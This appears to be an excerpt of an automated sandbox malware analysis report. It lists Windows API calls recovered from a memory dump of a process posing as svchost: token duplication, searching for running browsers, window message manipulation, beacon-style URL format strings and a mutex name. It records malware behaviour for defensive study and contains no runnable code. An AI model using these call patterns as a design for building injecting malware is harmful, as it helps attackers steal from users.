    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 00EF56E2
    • OpenProcessToken.ADVAPI32(00000000,00000002,00000000), ref: 00EF56F9
    • CloseHandle.KERNEL32(00000000), ref: 00EF571A
      • Part of subcall function 00EF56A8: DuplicateTokenEx.ADVAPI32(00000000,000F01FF,00000000,00000002,00000001,00000000), ref: 00EF56C2
    • CloseHandle.KERNEL32(00000000), ref: 00EF5717
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EFDC3F
    • Process32FirstW.KERNEL32(00000000,?), ref: 00EFDC59
      • Part of subcall function 00EFD99B: StrStrIW.SHLWAPI(?,chrome.exe), ref: 00EFD9B1
      • Part of subcall function 00EFD99B: StrStrIW.SHLWAPI(?,firefox.exe), ref: 00EFD9BF
      • Part of subcall function 00EFD99B: StrStrIW.SHLWAPI(?,iexplore.exe), ref: 00EFD9CD
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EFDC7B
    • CloseHandle.KERNEL32(00000000), ref: 00EFDC8B
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetWindowLongW.USER32(?,000000F0), ref: 00EFBAD2
    • SetActiveWindow.USER32(?), ref: 00EFBAF4
    • SendMessageW.USER32(?,000000F5,00000001,00000000), ref: 00EFBB05
    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EFBB0D
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • wsprintfA.USER32(?,/%s/%s/%d/%s/,0000001F,?,00000000,?,?,00EF49A5,00000000,?,?,?,?), ref: 00EF4010
    • wsprintfA.USER32(?,/%s/%s/%d/%s/%s/,0000001F,?,00000000,00000000,?,?,00EF49A5,00000000,?,?,?,?), ref: 00EF402F
      • Part of subcall function 00EF3EC7: GetVersionExW.KERNEL32(?), ref: 00EF3EFA
      • Part of subcall function 00EF3EC7: wsprintfA.USER32(00000000,/%s/%s/0/%s/%d/%s/,?,0000001F,?,00000451,?), ref: 00EF3FCA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 00EF5EFE
    • wsprintfA.USER32(00000002,%sbound-%d,00000000,00000000), ref: 00EF5F11
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00EFD13A
    • CloseHandle.KERNEL32(00000000), ref: 00EFD145
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrlenA.KERNEL32(?,?,?,00000000,00400000,00400000,?,00EFC5A6,?,00000000,?,?,?,00EFC7EA,?,?), ref: 00EF6527
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • lstrlenA.KERNEL32(?,?,00EFC5A6,?,00000000,?,?,?,00EFC7EA,?,?,?,?), ref: 00EF6551
      • Part of subcall function 00EF541F: StrToIntA.SHLWAPI(0294FF32), ref: 00EF543B
      • Part of subcall function 00EF53DA: lstrlenA.KERNEL32(0295002C,00EF37D1,0294FF30,00F032D0,02908008), ref: 00EF53DB
    • lstrlenA.KERNEL32(?), ref: 00EF658B
    • wsprintfA.USER32(00000000,00EFE858,?), ref: 00EF65B0
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd